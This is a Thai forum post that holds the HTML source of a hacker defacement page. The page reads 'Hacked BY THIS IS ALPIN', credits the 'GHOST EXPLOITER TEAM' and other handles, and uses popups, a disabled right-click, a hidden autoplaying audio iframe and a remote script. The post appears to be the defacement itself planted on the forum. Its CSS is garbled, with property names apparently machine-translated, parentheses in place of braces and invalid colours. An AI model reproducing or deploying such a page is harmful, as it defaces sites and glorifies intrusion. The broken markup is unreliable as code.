กระดานสนทนา

Hacked BY THIS IS ALPIN

<! --- Kalo mau recode, hargai yg buat cok {Coded by BL4CK-R05E} ->

<html> 

<head> 

<title> Diretas Oleh INI ADALAH ALPIN </title> 

<link rel = "icon" type = "image / jpg" href = "https://i.ibb.co/80xHvDL/90091102-636718703727756-2503190680746173349-n.jpg">

     <meta name = "description" content = "Can you love me?">

     <meta name = "keyword" content = "Apakah Anda siap tolose">

     <script> alert ("INI ADALAH ALPIN !!!"); </script>

     <script> alert ("Aku mencintai hidupku karena hidupku adalah kamu!"); </script>

<script src = "https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/daun-berguguran.js" type "text / javascript"> </script> 

<style> 

       @import url ('https://fonts.googleapis.com/css?family=Iceland');

       html, body ( 

              warna hitam; 

              font-family: Islandia; 

              font-weight: 80; 

              tinggi: 87vh; 

              margin: 0;

               )

      .full-height {height: 87vh; )

      .flex-center {align-items: center; tampilan: flex; justify-content: center; )

      .position-ref {position: relative; )

      .content {text-align: center; )

      .title {font-size: 36px; bantalan: 20px;

      display: none}

      

       h1, h2, p, a {

       font-family: Kelly Slab;

       font-weight: normal;

       }

       

       .jam-digital-x {

       overflow: hidden;

       width: 330px;

       margin: 20px auto;

       border: 10px solid #cyan;

       }

       .kotak{

       float: left;

       width: 100px;

       height: 100px;

       background-color: #cyan;

       }

       .jam-digital-x p {

       color: red;

       font-size: 40px;

       text-align: center;

       margin-top: 30px;

       

       }       

 </style> 

 </head> 

 <body align="center" oncontextmenu="return false" bgcolor="white"> 

 <div class="stars"><div class="twinkling"><div class="flex-center position-ref full-height"><div class="content"><div class="text"><b><i>

 <div class="jam-digital-x"><div class="kotak"><p id="jam"></p></div><div class="kotak"><p id="menit"></p></div><div class="kotak"><p id="detik"></p></div></div>            

 <br><br><img src='https://i.pinimg.com/originals/cc/74/59/cc745965068d0d497ae7662adb73bd24.png' style="width:500px;">

 <br><font size="40px">Hacked By <font color="red">THIS IS ALPIN</font> 

 <br><br><font size="6" color="red">=></font><font size="6"> I Always Love You in 3 Time Now, Tomorrow and Forever :) </font><font size="6" color="red"><=</font> 

 <br><br><font size="6" color="red"> Thanks to : </font> <marquee direction="left" scrollamount="15" ><font size="5" color="red"> ~ </font><font size="5">GH05T666</font><font size="5" color="red"> ~ </font><font size="5">Q.GH05T666</font><font size="5" color="red"> ~ </font><font size="5">D3V0L0P3R 37</font><font size="5" color="red"> ~ </font><font size="5">Razor</font><font size="5" color="red"> ~ </font><font size="5">BL4CK-R05E</font><font size="5" color="red"> ~ </font><font size="5">./Kabur</font><font size="5" color="red"> ~ </font><font size="5">D4nzX0</font><font size="5" color="red"> ~ </font><font size="5">Rizal01</font><font size="5" color="red"> ~ </font><font size="5">"Flo</font><font size="5" color="red"> ~ </font><font size="5">SadBroder_kh4t3m</font><font size="5" color="red"> ~ </font><font size="5">Babycode</font><font size="5" color="red"> ~ </font><font size="5">Hanabi</font><font size="5" color="red"> ~ </font><font size="5" color="red">THIS IS ALPIN</font><font size="5" color="red"> ~ </font><font size="5">Grapelce</font><font size="5" color="red"> ~ </font><font size="5">YuT4_Ra</font><font size="5" color="red"> ~ </font><font size="5">IceBear7</font><font size="5" color="red"> ~</font><font size="5" color="red"> ~</font><font size="5">Es bekicot</font><font size="5" color="red"> ~</font><font size="5">RZKY</font><font size="5" color="red"> ~</font></marquee>

 <br><font size="6" color="red"> Message: <br></font><font size="5" color="red"style="border:1px solid; border-color:red;" width="80%"> Hargai Aku Selagi Ada ,Dan intinya Aku cinta kamu Muehehehe</font></marquee> 

 <br><font size="7"></font>

 </font><font size="5"><br>GHOST EXPLOITER TEAM</font>

<font size="5"><br>&copy; Copyleft 2020</font>

 </div>

 </div>

 </div> <iframe width="0%" height="0" scrolling="no" frameborder="no" src="https://j.top4top.io/m_1636z2c2q1.mp3"></iframe>

 </body> 

 <script>

 window.setTimeout("waktu()", 1000);

 

 function waktu() {

 var waktu = new Date();

 setTimeout ("waktu ()", 1000);

 document.getElementById ("jam"). innerHTML = waktu.getHours ();

 document.getElementById ("menit"). innerHTML = waktu.getMinutes ();

 document.getElementById ("detik"). innerHTML = waktu.getSeconds ();

 )

 </script>

 </html> 

เอกสารแนบ :

โดย: ALPIn Gans (ผู้ดูแลระบบ) [12 พฤศจิกายน 2563 : 07.01 น.]

แสดงความคิดเห็น
รายละเอียด :
รหัสรูปภาพ :

กรุณาระบุตัวอักษรที่ปรากฎด้านบน

ชื่อผู้แสดงความคิดเห็น :
Email
ยังไม่มีผู้ตอบ